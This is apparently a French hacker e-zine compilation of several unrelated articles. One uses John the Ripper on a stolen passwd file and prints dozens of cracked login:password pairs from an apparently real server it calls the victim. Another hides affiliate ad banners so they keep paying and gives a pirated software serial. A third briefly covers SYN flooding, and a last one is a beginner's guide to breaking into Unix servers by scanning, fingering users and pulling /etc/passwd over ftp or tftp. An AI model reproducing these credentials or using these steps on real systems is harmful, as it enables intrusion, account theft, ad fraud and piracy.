Voici un article sympa pour eviter de se prendre la tete quand on a besoin de craquer avec John the Ripper v1.2, la documentation etant en anglais, ca pose des problemes a pas mal de monde alors je vais resumer et donner quelques astuces.
Les explications se rapportent a John the Ripper v1.2 pour MS-DOS ou Windows (win32) mais le prochain article (cf : CounterStrike #3) traitera uniquement des plateformes UNIX.
Tout d'abord, on vient de recuperer son fichier passwd par le moyen que vous voulez alors on est tres content, si on utilise john normalement, on va faire par exemple john -single passwd.1 et on verra arriver un truc genre :
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar
Designer
Loaded 381 passwords with 362 different salts
aluba (aluba)
staff (staff)
akko (akko)
bmwepm (bmwepm)
cerezo (cerezo)
sss (sss)
mandante (andante)
yagemi (miyage)
marie123 (marie)
news555 (news)
reg888 (reg)
v: 11 c: 231414 t: 0:00:00:06 99% c/s: 38569 w: *****DONE*****
Nous voila donc avec 11 comptes dans nos filets, c'est pas grand chose quand on sais qu'il y en a 381 mais c'est deja un bon debut...
Le mode single utilise en fait une petite liste de mots de pass courants integres a John, on va maintenant utiliser une vraie word list, la, on a que l'embaras du choix, y a des milliards de word lists sur la terre mais comme on a affaire a un serveur coreen, on va utiliser une wordlist coreenne qu'on va appeler word.lst par exemple, pour utiliser john avec cette word list, on fera donc : john -wordfile:words.lst passwd.1 sachant que le mode wordfile indique a John qu'on travaille en word list avec la liste qui suit l'instruction. On obtiendra donc ce resultat par exemple :
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar
Designer
Loaded 370 passwords with 351 different salts
100 (million)
aguri (noriko)
akatsuki (shigyo)
anko (snd)
atsu (yoko)
azusa (sgt)
...
love (ai)
mama (anne)
matsu (masa0811)
mayumi (manyumi)
momo (dear)
nagae (miyataka)
nanase (anemone)
nobuki (bigwave)
qwertyui (takahiro)
riho (yumiohi)
risa (deto)
sen (michiyo)
suzumi (kysb)
tami (kanpei)
tokio (benlly)
tomohiro (mar)
tora (showko)
toshiko (ohwaki)
yakiniku (seikouen)
yoshiko (yoshio)
v: 33 c: 40770111 t: 0:00:13:06 99% c/s: 51870 w: *****DONE*****
Bon, on a maintenant 33 comptes de plus, c'est un bon debut, on a helas besoin d'un maximum de comptes si ce n'est tous et si possible, du root donc on va utiliser une autre methode, le mode brute force reel aussi appelle mode incrementiel, pour se faire, on tapera la commande suivante : john -i passwd.1 -beep qui donnera donc pour resultat :
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar
Designer Loaded 337 passwords with 321 different salts dp (murota) 1234 (katsu) 1234 (fujita) 1234 (minami) 1234 (hitoko) 1234 (shimiken) 1234 (karasawa) 1234 (newton) 1234 (futami) 2211 (tamiko) fff (hiro) 1940 (hori) 1956 (akimaro) 130 (yonezawa) f32 (ken2) 1274 (junjun) 330 (nishi) 163 (hiromi) t14 (hiramura) 1010 (shigeru) 1984 (info) 1108 (uedagumi) 1919 (fukuda) 1919 (kara) 1439 (pojriku) 1307 (chikako) 1326 (ojisan) s2675 (soma) brain (postman) 3401 (dentalsy) 3220 (hakui) 3220 (hds) 3368 (ohi) 4250 (n34) 4774 (ritsu) 4001 (kawani) 2724 (ucchy) 2738 (kosaka) 3622 (banjos) 3655 (takata) 4656 (takachu) 1678 (dohi) 6096 (tec) 6551 (advance) |
|
Bon, on en a maintenant 89 au total et ca a pris deux bonnes heures en mode incrementiel, eh oui, le principal defaut de ce mode est sa duree, pour craquer les 381 comptes, avec cette becanne, il me faudrait 2 bonnes semaines, en 2 jours, j'en ai eu 110, la duree de ce mode augmente a chaque compte de facon exponentiel et c'est normal...
On a maintenant un certain nombre de comptes dans nos filets et c'est pas pour nous deranger, pour les consulter, c'est une autre histoire puisqu'il n'enregistre pas ca dans un fichier ou enfin si mais john.pot n'est pas exploitable a l'etat brut, on va donc utiliser l'instruction suivante : john -show passwd.1 et la, John va lire John.pot et vous presenter une liste de login/pass plus lisible, plus mais pas encore assez quand on sait que nous avons nos 89 comptes qui doivent apparaitre et que donc, la fenetre MS-DOS est trop petite, voyons deja ce que ca donnerais.
yoshio:yoshiko:40044:110:::/bin/csh
kosaka:2738:20179:110:::/bin/csh
hakui:3220:40151:110::/export/home1/htdocs/hakui:/bin/csh
hds:3220:40152:110:::/bin/csh
noriko:aguri:40163:110:::/bin/csh
katsu:1234:10518:110:::/bin/csh
karasawa:1234:114:110::/export/home1/usr/karasawa:/bin/csh
rikukaze:gorou:10519:110:::/bin/csh
ucchy:2724:10522:110:::/bin/csh
manyumi:mayumi:10526:110:::/bin/csh
shigeru:1010:20183:110:::/bin/csh
takata:3655:10535:110:::/bin/csh
uedagumi:1108:10538:110:::/bin/csh
soma:s2675:10539:110:::/bin/csh
n34:4250:20187:110:::/bin/csh
nishi:330:30032:110:::/bin/csh
ohwaki:toshiko:10541:110:::/bin/csh
tec:6096:20190:110:::/bin/csh
shigyo:akatsuki:10549:110:::/bin/csh
89 passwords cracked, 293 left
Pour la plupart d'entre nous on peut pas laisser la becanne bosser sur un truc pendant 2 semaines sans arret soit parce qu'on dort avec la becanne dans la meme chambre, soit parce que ca consome trop de ressources, pour cela, John est assez bien foutu puisqu'il permet de couper tout et de reprendre plus tard, exactement la ou il en etait mais on va pas s'emmerder a taper ces putain de commandes toutes les 2 minutes... On va donc creer des fichiers batch, en shell MS-DOS tout con, de simples fichiers executables faits sous edit, le premier sera john.bat et contiendra par exemple :
john
-i passwd.1 -beep
pause
Enregistrez et lancez, grace a votre nouveau programme john.bat, vous etes maintenant capable de lancer john en mode incrementiel sur votre fichier passwd d'un simple (double) click de souris, le -beep veut tout simplement dire que john emmetra un signal sonore via le buzzer de votre becanne a chaque nouveau pass obtenu.
Comme on le disait
plus haut, la fenetre MS-DOS est trop petite pour le nombre de pass obtenue,
on va alors creer un autre fichier batch que l'on nomera communement par l'adresse
ip de la victime, xxx.xxx.xxx.xxx.bat.
Ce fichier devra contenir la commande john -show
passwd.1 | more.
Pour ceux qui connaissent un peu la syntaxe, on envoies les resultats de john
a un programme integre a dos (et aussi a unix) qui s'appelle more. C'est ce
programme qui va etre charge d'afficher les resultats page par page, et oui
mais voila, vous ne pouvez pas revenir en arriere et vous allez pas lancer
votre fichier toutes les 2 minutes... et on sait qu'on peut envoyer les resultats
a un programme et il y a mieux, on va carrement les envoyer a un fichier en
utilisant la commande john -show passwd.1 >
c:\windows\desktop\serveur.txt. Creeons maintenant l'interface
du programme pour qu'il ne soit pas trop moche, on va deja mettre un petit
message d'introduction puis l'adresse IP de la victime pour etre sur de ne
jamais la perdre et de ne pas se tromper, on lance une instruction, on emet
un autre message pour prevenir que les resultats seront enregistres dans un
fichier et on lance la derniere instruction. Votre programme termine devrait
ressembler a ceci :
@Echo off
Echo -----------------------------------------------
Echo \ ATTENTION \
Echo \ VOUS ETES SUR LE POINT \
Echo \ D'ACCEDER A DES INFORMATIONS \
Echo \ CONFIDENTIELLES \
Echo \ \
Echo \ M D R \
Echo \ serveur victime : xxx.xxx.xxx.xxx \
Echo -----------------------------------------------
pause
john -show passwd.1 | more
Echo -----------------------------------------------
Echo \ \
Echo \ \
Echo \ Now Writing results \
Echo \ in c:\windows\desktop\serveur.txt \
Echo \ \
Echo -----------------------------------------------
john -show passwd.1 > c:\windows\desktop\serveur.txt
echo on
On va donc retrouver dans c:\windows\desktop (c:\windows\bureau pour les francais) le fichier serveur.txt qui contientra :
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer
info:1984:999:110::/home/info:/bin/csh
kara:1919:103:60001::/home/kara:/bin/csh
akimaro:1956:10209:110:::/bin/csh
benlly:tokio:10217:110:::/bin/csh
million:100:205:110:::/bin/csh
snd:anko:30619:110:::/bin/csh
miyage:yagemi:10294:110:::/bin/csh
reg:reg888:888:110:KARATSU Regist:/home/reg:/bin/csh
honnami:kazu:10313:110:::/bin/csh
ken2:f32:10317:110:::/bin/csh
work:karakara:100:100:KARATSU Staff::/bin/csh
masa0811:matsu:10326:110:::/bin/csh
dohi:1678:20078:110:::/bin/csh
dear:momo:30025:110:::/bin/csh
sun:hayashis:10354:110:::/bin/csh
michiyo:sen:10355:110:::/bin/csh
bmwepm:bmwepm:10358:110:::/bin/csh
elder:NO PASSWORD:MTtbLAQEqwQuw:208:110::/home/elder:/bin/csh
anemone:nanase:20050:110::/home/anemone:/bin/csh
hiramura:t14:10374:110:::/bin/csh
seikouen:yakiniku:10377:110::/home/seikouen:/bin/csh
yonezawa:130:20060:110:::/bin/csh
hori:1940:10397:110:::/bin/csh
anne:mama:20062:110:::/bin/csh
murota:dp:30015:110:::/bin/csh
dentalsy:3401:20065:110:::/bin/csh
mar:tomohiro:10406:110::/home/mar:/bin/csh
advance:6551:30027:110:::/bin/csh
ojisan:1326:10412:110::/home/ojisan:/bin/csh
andante:mandante:10000:110:::/bin/csh
andoh:hattori:10413:110:::/bin/csh
showko:tora:10419:110:::/bin/csh
agri24:kita:10426:110:::/bin/csh
tamiko:2211:30006:110:::/bin/csh
cerezo:cerezo:20098:110::/export/home1/htdocs/cerezo:/bin/csh
yoko:atsu:40081:110:::/bin/csh
ohi:3368:40080:110:::/bin/csh
yumiohi:riho:20108:110:::/bin/csh
aluba:aluba:20110:110:::/bin/csh
kawani:4001:30009:110:::/bin/csh
kysb:suzumi:20121:110:::/bin/csh
miyataka:nagae:10459:110:::/bin/csh
banjos:3622:30011:110:::/bin/csh
hitoko:1234:10464:110:::/bin/csh
news:news555:555:110:KARATSU News:/home/news:/bin/csh
marie:marie123:20128:110:::/bin/csh
staff:staff:50001:60001::/home/staff:/bin/csh
sss:sss:50002:60001::/home/sss:/bin/csh
pojriku:1439:10474:110:::/bin/csh
postman:brain:20135:110:::/bin/csh
sgt:azusa:10478:110:::/bin/csh
takachu:4656:20142:110:::/bin/csh
ritsu:4774:10483:110:::/bin/csh
hiro:fff:10484:110:::/bin/csh
akko:akko:20147:110:::/bin/csh
takahiro:qwertyui:20148:110:::/bin/csh
bigwave:nobuki:20160:110:::/bin/csh
deto:risa:20163:110:::/bin/csh
minami:1234:30031:110:::/bin/csh
ai:love:40112:110:::/bin/csh
futami:1234:10499:110:::/bin/csh
newton:1234:20169:110:::/bin/csh
fujita:1234:10501:110:::/bin/csh
chikako:1307:20172:110:::/bin/csh
kanpei:tami:20173:110:::/bin/csh
emi:hitomi:10505:110:::/bin/csh
shimiken:1234:10509:110:::/bin/csh
fukuda:1919:30005:110:::/bin/csh
junjun:1274:10513:110:::/bin/csh
hiromi:163:112:110:::/bin/csh
yoshio:yoshiko:40044:110:::/bin/csh
kosaka:2738:20179:110:::/bin/csh
hakui:3220:40151:110::/export/home1/htdocs/hakui:/bin/csh
hds:3220:40152:110:::/bin/csh
noriko:aguri:40163:110:::/bin/csh
katsu:1234:10518:110:::/bin/csh
karasawa:1234:114:110::/export/home1/usr/karasawa:/bin/csh
rikukaze:gorou:10519:110:::/bin/csh
ucchy:2724:10522:110:::/bin/csh
manyumi:mayumi:10526:110:::/bin/csh
shigeru:1010:20183:110:::/bin/csh
takata:3655:10535:110:::/bin/csh
uedagumi:1108:10538:110:::/bin/csh
soma:s2675:10539:110:::/bin/csh
n34:4250:20187:110:::/bin/csh
nishi:330:30032:110:::/bin/csh
ohwaki:toshiko:10541:110:::/bin/csh
tec:6096:20190:110:::/bin/csh
shigyo:akatsuki:10549:110:::/bin/csh
89 passwords cracked, 293 left
Et voila, vous pouvez maintenant revenir en arriere, en avant, rechercher des chaines de caracteres avec notepad et tout est sauvegarde.
Quand le programme arrive a craquer les 381 comptes, il devrait automatiquement sauvegarder les resultats, on va donc implementer au programme john.bat une variante de xxx.xxx.xxx.xxx.bat pour que tout soit sauvegarde automatiquement des la fin de decryptage, voici la nouvelle tete de john.bat :
john -i passwd.1 -beep
@Echo off
Echo -----------------------------------------------
Echo \ ATTENTION \
Echo \ VOUS ETES SUR LE POINT \
Echo \ D'ACCEDER A DES INFORMATIONS \
Echo \ CONFIDENTIELLES \
Echo \ \
Echo \ M D R \
Echo \ serveur victime : xxx.xxx.xxx.xxx \
Echo -----------------------------------------------
pause
john -show passwd.1
Echo -----------------------------------------------
Echo \ \
Echo \ \
Echo \ Now Writing results \
Echo \ in c:\windows\desktop\serveur.txt \
Echo \ \
Echo -----------------------------------------------
john -show passwd.1 > c:\windows\desktop\serveur.txt
echo on
On a donc enleve le | more de xxx.xxx.xxx.xxx.bat et nous voila avec un programme completement automatise et autonome, on le lance au demarage et il travaillera toute la journee en fond.
Pour m'apporter vos conseils, astuces, appreciations ou autres suggestions au sujet de cet article, ecrivez moi a ecomdespe@hotmail.com.
Structure
de l'article :
Introduction
1> les boites de dialogue rebelles
2> Les bannieres d'acces gratuit (Canada&US)
3> Les bannieres pour gagner de l'argent
Conclusion
Introduction : |
On
connait tous ces bannieres qui nous pompe vraiment a longueur de journee pour
ceux qui tournent sous windows, que ce soient les fenetre du style "Le
programme a effectue une operation non conforme et va etre ferme, cliquez sur
ok pour le fermer" on clique sur ok et evidement, la fenetre avec le meme
message re-apparait immediatement et y a rien a faire pour l'arreter, elle reste
au premiere plan et c'est vraiment tres casse... pieds, on a aussi les bannieres
pour les canadiens et americains qui sont fournies avec les acces gratuits a
internet (altavista, excite, etc...) en guise de sponsor, il y a aussi les bannieres
des programmes d'affiliations qui comme les bannieres d'acces gratuit restent
au premier plan de votre ecran et se re-actualisent toute les 30 secondes, j'ai
trouve par hasard il y a juste une semaine une solution a tous ces problemes
et j'ai donc decide de vous faire partager cette trouvaille.
J'utilise pour
cela un programme qui s'appelle Windows Sniper, vous le trouverez a l'adresse
suivante : http://www.unhuman.com
Ce programme est fait en VB (si, si, et y marche vraiment et tout...) et
vous permet de controler toutes les fenetres de windows a volonte.
Voici un petit texte que je me contente de traduire pour vous decrire le programme :
"
Le but de ce programme est de vous rendre le controle
de votre ordinateur.
Trop souvent, les developpeurs de logiciels pensent que vous voulez faire
les choses comme eux le font.
Malheureusement, bien souvent ca ne fonctionne pas de cette facon chez
l'utilisateur final.
Maintenant, vous pouvez utiliser Windows Sniper pour contribuer a ce que
votre ordinateur se comporte comme VOUS le souhaitez.
Windows Sniper vous permet de faire toutes ces choses.
Quand vous faites une action, vous pouvez apprendre a windows sniper a faire
automatiquement cette action quand il detectera qu'un scenario s'execute.
Par exemple, chaque fois qu'une fenetre pop-up apparait et que vous savez que
vous devez systematiquement appuyer sur le meme boutton chaque fois que la fenetre
apparait (par exemple une fenetre presentant le boutton "ok"), vous
pouvez apprendre au programme a faire cette action a votre place et a chaque
fois que le programme verra cette fenetre, il cliquera sur le boutton "OK"
a votre place rapidement et facilement."
Source : Millenium Group - The Egoiste
Pour vous rentre
la vie encore meilleure, voici un serial pour windows sniper :
User name : TipiaK
Registration number : ST5pfNR7MYBcoRUvaZ+uZnh+HGM
1 -- Les boites de dialogues rebelles : |
On
ne connait que trop le scenario du petit utilisateur tout gentil tout mignon
que nous sommes tous en train de surfer sur internet quand soudain, le navigateur,
que ce soit netscape aussi bien que internet explorer, s'arrete sans raison
pour nous mettre en relation directe avec son amie la fenetre "Ce programme
a effectue une operation non conforme et va etre ferme", cette fenetre
nous aime tellement que quand on va cliquer sur "OK", elle va se fermer
pour re-apparaitre immediatement et ceci, a l'infini, donc ca s'arrete jamais
(pleonasme, je sais, vos gueules...)
On va donc lancer notre beau Windows Sniper, cliquer sur l'option "Pseudo
Hide" puis, faire glisser la cible sur la fenetre qui doit disparaitre,
la, on va maintenant cliquer sur "Take Windows out" et la Oh miracle,
la fenetre a disparu et vous pouvez continuer a travailler... pour faire re-apparaitre
la fenetre, on cliqueras simplement sur le boutton "BB".
On aurait eu cependant mieux fait d'utiliser la commande "encapsulate"
on aurait donc pu cliquer sur l'onglet "Parents" puis sur l'option
"Encapsulate" puis encore fait glisser l'obectif sur la fenetre et
clique sur le boutton "Take Window out" et la, on voit la fenetre
maintenant incorporee dans une autre fenetre avec un menu options...
Une fois dans ce monu, on cliques sur cloak (camoufler) et la encore miracle,
la fenetre a disparu et n'est meme pas dans la barre de taches. Pour faire revenir
la fenetre, on va se rendre dans windows sniper puis cliquer encore une fois
sur "Take Window out".
Et bien nous voila debarrasse d'une bonne chose !
2 -- Les bannieres d'acces gratuit (Canada&US) |
En
france, on trouve beaucoup de providers gratuit et c'est normal puisque les
factures de communication telephoniques atteignent les plus sommets internationaux,
cela permet a france telecom (notre operateur prefere) de filer du fric a ces
providers qui leur offrent des petits clients tout chauds tout beaux...
Comme tout le monde le sait (j'espere) aux etats-unis ainsi qu'au canada, les
communications telephoniques pour internet sont entierement gratuites donc evidement,
les providers gratuit, ca cours pas les rues...
Il y en a tout de meme (altavista, excite, abc.com, etc...) mais il y a tout
de meme quelque chose de tres emmerdant avec ces providers, ils imposent des
bannieres de pub qui vont s'installer au premier plan de votre windows... sisi,
vous avez bien lu, ca prend facile dans les... 1/6e de votre ecran et c'est
franchement casse couille, en plus, il faut cliquer sur les bannieres au moins
une fois toutes les heures car sinon, ca va vous deconnecter, et si vous fermez
la fenetre, ca vous deconnecterais aussi... SI !
Alors tonton LoginX arrive encore avec l'artillerie lourde... ils veulent nous
en faire bouffer de la pub, bah tres bien on va la bouffer, mais on va
essayer de la digerer plus facilement, tout d'abord, il faut charger Windows
Sniper puis aller directement dans parents, cette fois ci, pas de chichi, on
va pas essayer 36 solutions, on va directement encapsuler la fenetre comme explique
dans le chapitre precedent, helas, il faudra toutes les heures faire sortir
la banniere de son ptit trou parce que si vous cliquez pas dessus une fois par
heure ou que vous restez inactif trop longtemps, et bah paf, ca vous vire...
Mais fort heureusement il y a des cracks pour lutter contre ca... des simples
programmes qui virent le timeout donc vous restez connecte en permanence et
qui virent le banner refresh, en effet, toutes les minutes, le programme va
changer de banniere pour afficher un nouveau sponsor et ca vous bouffe la bande
passante de maniere hallucinante, les cracks deja disponibles permettent de
virer cette fonction qu'on ne peut pourtant pas qualifier de debile, on peut
pas leur en vouloir de vouloir grappiller 3 sous par ci par la...
3 -- Les bannieres pour gagner de l'argent |
C'est
devenu presque obligatoire, on est deja tous abonnes a un programme d'affiliations
quelconque, d'une maniere ou d'une autre meme si on ne le sait pas, on sait
aussi tous ce que c'est j'espere mais sinon c'est pas grave, ne vous affolez
pas, j'explique.
Une nouvelle economie a recement fait surface, et ce, quoi qu'on dise de mal
contre internet, grace (justement) a internet, des emplois sont crees et des
tas de personnes commencent a gagner pas mal de fric grace a ca, cette economie
paralelle est basee sur un systeme qui meme si on ne le pense pas forcement,
est rentable pour tout le monde, ce systeme s'appelle l'affiliation, c'est tres
simple, une personne va vouloir promouvoir son site ou ses services, il faut
qu'il atteigne le plus de monde possible, mais que ca ne lui coute pas trop
cher, il ne peut pas mettre des bannieres dans la rue puisque a peine 30% de
la population qui regardera son affiche aura la possibilite de regarder son
site et donc de lui faire gagner sa vie, il faut donc trouver un endroit pour
faire sa pub sans que ca gene trop mais pour que ca touche un maximum de monde
possivle.
La rue n'existant pas sur internet, puisqu'on pourrait dire qu'on passe directement
de piece en piece, il n'y a pas 36 solution, il faut placer sa banniere dans
une piece, mais pour ca, il faut l'accord du proprio et donc il faut le payer.
Des hebergeurs gratuits sont alors apparus, vous proposant de l'espace (une
piece) gratuit a la seule condition que vous placiez une banniere de pub sur
votre site, sachant que ces hebergeurs vont avoir du succes, ils savent que
meme si juste 1% des visiteurs des sites heberges chez eux vont cliquer sur
la banniere, ca sera toujours rentable, ces hebergeurs sont tres vite devenus
tres gros et pour cause, ils recoivent de l'argent de tout les cotes... de l'etat
parce qu'ils promouvoient un nouveau moyen de communication, de france telecom
parce qu'ils attirent du monde a rester connecte plus longtemps sur internet,
et donc des sponsors, bientot, de plus en plus de monde a voulu faire comme
eux et placer des bannieres pour des annonceurs divers, de veritables regies
publicitaires se sont mises alors en place pour satisfaire cette nouvelle demande
qui s'annoncait deja prometeuse, les bannieres sont tres vite devenues vitale
pour tout site qui tient a se promouvoir et se faire connaitre et tous les systemes
sont bons pour nous faire bouffer des bannieres, le dernier truc qu'ils ont
inventes, c'est de nous payer pour les bouffer, alors nous comme on est vraiment
radins, on les bouffe les bannieres, mais voila, ca fait planter windows, ca
se met au premier plan de votre ordinateur et on a l'impression que c'est carrement
les annonceurs qui surfent sur internet a notre place...
Voila donc l'interet encore une fois, de ma trouvaille, Windows Sniper, en effet,
si vous reduisez les fenetres, le programme va le detecter et vous gagnerez
plus de sousous :(
La technique de l'encapsulation encore une fois va nous sauver, nous allons
tout simplement encapsuler la banniere de pub, puis camoufler la nouvelle fenetre
et la oh miracle (bis) on ne voit plus la banniere, et le must, c'est que la
banniere est invisible mais pas reduite, donc vous continuez a gagner votre
fric, vous pouvez donc vous abonner sans aucun probleme a 3, 4, 5 programmes
d'affiliations (si vous avez le cable paske sinon votre connexion va vite lacher)
sans remarquer aucun changement mais en gagnant beaucoup d'argent.
Mais attention, il y a encore mieux... on utilise pas de crack ou rien, c'est
parfaitement legal, personne ne peut vous accuser de tricher parce que vous
camouflez une fenetre sur votre propre ordinateur.
Conclusion : |
Depuis
la prehistoire, l'homme a toujours eu envie de controler ses con-generes, de
fouiller dans les affaires des autres, de les surveiller, etc...
Cette attitude est devenue commune est s'est considerablement developpee
grace (a cause de) a Internet, les developpeurs vont maintenant de plus en plus
loin pour nous faire faire ce qu'ils ont envie qu'on fasse, pour savoir qui
on est, ce qu'on fait et pourquoi, contrairement a ce que tout le monde dit,
c'est pas (que) pour le fric, c'est tout simplement parce que ca a toujours
ete dans la nature de l'homme de vouloir controler les autres quand il est en
situation de force, cet article vous l'a demontre et vous a surtout appris a
faire tourner court a ces protocoles stupides de mouttons qui consistent a se
laisser faire, la theorie du "Apres tout c'est pas si mal", grace
a cet article, vous reprenez le control de votre systeme dont les trous de securite
non pas dans la programmation mais dans l'organisation, ont etes exploites a
l'insu de votre plein gre par des gens mal intentionnes et ca c'est vraiment
pas bien alors maintenant, vous reprenez le controle complet.
Elle est pas belle la vie ? :)
Si vous souhaitez que je fasse un article plus complet sur Windows Sniper ou les bannieres en general pour CounterStrike #3, envoyez moi un message a l'adresse suivante : loginx@tipiak2000.com mais si cette adresse marche pas, mon adresse permanente est ecomdespe@hotmail.com
J'espere avoir
resolu les problemes que vous pouviez avoir lors de cet article.
Si vous souhaitez voir un article precis de moi dans CounterStrike #3 et que
vous pensez que j'en suis capable, envoyez moi un email, pareil, a ecomdespe@htomail.com
Quand un systeme (appele le client) essaye d'etablir une connection TCP (Transfert
Control Protocole) a un serveur , le client et le serveur se mettent a echanger
une sequence de message. Cette technique de conection est applique sur toutes
les connections TCP (telnet, web , email etc ...).
Le client commence par envoyer une demande de synchronisation SYN (SYN pour
synchronisation) et un ISN (numéro initial de séquence) au serveur
. Le serveur reconnais le message SYN puis renvoi un flags SYN, un ISN, et
un flag ACK (ACK pour acknoledgement) au client, qui autorise la connexion.
Enfin le client renvoie les flags SYN et ACK, ce qui ouvre un circuit de communication
en mode full duplex. La connexion entre le client et le serveur permet d'échanger
les données spécifiques.
En fait ca donne un truc comme ca (une image vaut mieux que mille mots):
Client
|
Serveur
|
SYN-ISN -----------> | |
<----------- SYN-ISN-ACK | |
SYN-ACK -----------> |
Bon comment
on vas faire pour creer un debordement de memoire (overflow) sur le serveur
, comment on vas faire ca !
Ba c'est tout con on vas utiliser un programme pour envoyer des flags SYN
au serveur. Je vais quand même pas vous expliquer comment envoyer des flags
syn.
Si vous etes sous linux c'est plus facile de trouver un prog alors je vais
vous laisser chercher comme vous etes sur cette os =).
-Je m'en souvien plus =(
Arf
!J 'aurais déjà pas dû mettre ce titre;tant pis,mais
je sais pas comment on fait pour effacer...
Ce 'tit file est déstiné aux gens HONNETES qui s'intéressent
de près ou de loin à la sécurité informatique
=).Je ne vous encourage en aucun cas à faire ce qui suit, étant
donné que c'est illégal ( entendez par la que c'est pas légal
).Bon et comme d'hab, si vous le faites quand même, et bien ni moi ni
le crew Tipiak ne répondrons de vos conneries ( hého faut pas
rêver ).
-Intro:
Cet
article est déstiné aux newbies de Linux ( jen suis un aussi
). Il aborde quelques failles de sécurités simples à
exploiter, et vous parmettra normalement de vous pogner au moins un account
sur un server, ce qui est déja pas mal pour commencer. Achtung !Nous
ne parlerons ici que de servers sous *nix ( pas NT ) et nos principales attaques
(toutes ?) se dérouleront a partir d'une station Linux (la vôtre
ou un server ).
Ben voila pour l'intro...Si vous avez des problemes, ou des questions ou des
suggestion ou des cadeaux: _n9_@Caramail.com
ou chuis sur Hilti: 0800 397 397 vmb n° 8631 voila on va pouvoir commencer
la...
Ah oué, j'oubliais les prérequis: une connaissance minimale
de Linux, et ... de la patience =).
1) Obtenir des informations sur la cible:
nmap :
Il est important de connaitre un maximum une cible potentielle ( OS et version des démons...)
-pour
connaitre l'OS de notre server, on peut utiliser NMAP, qui est en fait un
scanner de ports. (pour lancer la détection d'OS il faut etre
root sur votre bécane)
>Tipwar $ su
password:
root@Tipwar # ./nmap -sS -p 80 -O -v www.cible.com
Et
voilà...si nmap a bien fait son boulot ( ce qui arrive presque tjrs
), vous avez déja une info importante...
n.b.:On pourrait très bien faire une tite session telnet sur le port
23 de notre server afin de glaner les infos voulues, mais les admins s'amusent
souvent a virer le greeting avec le nom et la version de l'OS, voire carrément
a faire de l'intox...
Voila ce que ca donne :
melchior:/nmap#
./nmap -sS -p 80 -O -v www.chez.com
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Host www.chez.com (195.68.91.28) appears to be up ... good.
Initiating SYN half-open stealth scan against www.chez.com (195.68.91.28)
Adding TCP port 80 (state Open).
The SYN scan took 0 seconds to scan 1 ports.
For OSScan assuming that port 80 is open and port 42496 is closed and neither
are firewalled
Interesting ports on www.chez.com (195.68.91.28):
Port State Protocol
Service
80 open
tcp http
TCP
Sequence Prediction: Class=random positive increments
Difficulty=2571413
(Good luck!)
Sequence
numbers: 47D0A9B8 47DD7A1B 47E694B7 4772AEA2 475A4DE6 47821838
Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
Voila: Chez ils runnent Linux =) on est pas les seuls.
Continuons avec nmap; on va juste scanner les ports de notre server, comme ca pour voir ...
>root@Tipwar
# ./nmap -sS -v www.cible.com
Ici, nmap nous fait un scan TCP "furtif". ( demi-ouverture des ports pour
rester discret...je sais pas si c'est vraiment efficace mais bon...)
ou
>Tipwar $ nmap -ST -v www.cible.com
pour un scan TCP normal.(amusez vous a telnetter sur tous les ports ouverts,
surtout si le 23 et le 25 sont fermés )
finger / rusers :
Nous pouvons ensuite utiliser la commande "finger" pour cette fois ci, obtenir des infos sur les utilisateurs.
Tipwar
$ finger @www.cible.com
[www.FT.com]
Login Name TTY
Idle When Where
------ ------- ----
----- -------
--------
_n9_ lol
co 45d Tue 5h00 Tipiak.com
NEXXT mdr
co 30s Wed 6h30 Tipiak.com
Mmh,
deux utilisateurs de loggués: _n9_ vous avez mon nom =)
vous savez que je suis loggué et que je scotche mon écran sans
rien faire depuis 45 jours ( donc théoriquement chuis pas là,
ou je suis mort) et NEXXT, lui il a commencé a scotcher ya 30s.Je vous
laisse deviner les deux dernieres colonnes...
ndlr: finger peur servir à éviter de venir sur le server
en même temps que le root et éviter ainsi de se faire remarquer...
n.b.: finger -l c'est sympa aussi
-rusers une autre commande similaire a finger, je vous laisse en juger par vous meme:
Tipwar $ rusers -l www.cible.com
Login
Home-dir Shell Last login,
from where
------- ------------ ------
---------------------------
root
/ /bin/sh Fri Nov 5 07:42 on ttyp1 from fuck.FT.com
bin
/bin
Never logged in
nobody
/
Never logged in
n9 /home/n9/ /bin/sh
Tue Dec 9 13h01 on ttyp2 from tipiak.com
psy /home/psy /bin/psi Sun
Mar 2 00h44 on ttyp1 from tiptop.cz
guest /export/foo /bin/sh Never logged in
ftp /home/ftp
Never logged in (mmh)
Bah voila kwa j'ai pas grand chose a dire la dessus =)
-Dernière
chose on peut aussi telneter sur le port 25 ( SMTP )de notre victime, pour
connaitre la version de son Sendmail. ( plus c'est vieux, mieux c'est ! du
genre en dessous de 8.5 c'est cool).
Par contre, je traiterai pas de ça dans cet article, donc soit vous
vous démerdez, soit vous attendez CounterStrikE XX où ca sera
vraisemblablement dedans...
2) Les Failles:
Bon, vous pouvez toujours tester le bug ftp ( cf Tipiak )mais c'est un miracle
si ca marche
Sinon c'est pas compliqué, pour se trouver un account, il faut
aller chercher le fichier pass: /etc/passwd...
Si d'une manière ou d'une autre vous l'avez choppé, hop ! john
the ripper (cf l'article de LoginX.)
-Ensuite,
si l'admin est à chier, essayez de récupérer le fichier
passwd en ftp:
Tipwar $ ftp www.cible.com
Login: ftp
Pass: ftp
ftp>get /etc/passwd
-Y'a aussi les cgi: ( ya des scanners pour ca >VoideYe sur Tipiak).Je m'étend pas dessus, si le scanner il dit y'a bon, ben vous mettez lurl dans le browser et c'est fini...Ca aussi ca devient tres difficile a trouver...
tftp :
Il existe un programme semblable a ftp: tftp ( trivial file transfert program ) qui permet, si le démon est présent d'écrire et de lire partout sur le server, sans avoir besoin de pass...La encore, l'admin du server doit etre con comme pas deux.
Tipwar
$ tftp
tftp> connect www.cible.com
get /etc/passwd
OS | Path |
Sun OS 4.1 | /etc/security/passwd.adjunct |
Sun OS 5.0 | /etc/shadow |
System V 4.0 | /etc/shadow |
System V 4.2 | /etc/security |
ConvexOS 10/11 | /etc/shadow |
Linux | /etc/shadow |
IRIX 5 | /etc/shadow |
AIX | /etc/security/passwd |
BSD4.3-Reno | /etc/master.passwd |
Dg ux | /etc/tcb/aa/user |
Hp ux | /.secure/etc/passwd |
Unicos | /etc/udb |
Un
dernier mot: un fichier passwd, meme shadow, c'est toujours intérssant:
amusez vous a essayer de vous logger en utilisant le meme pass que le login,
vous verrez, ca porte souvent ses fruits;
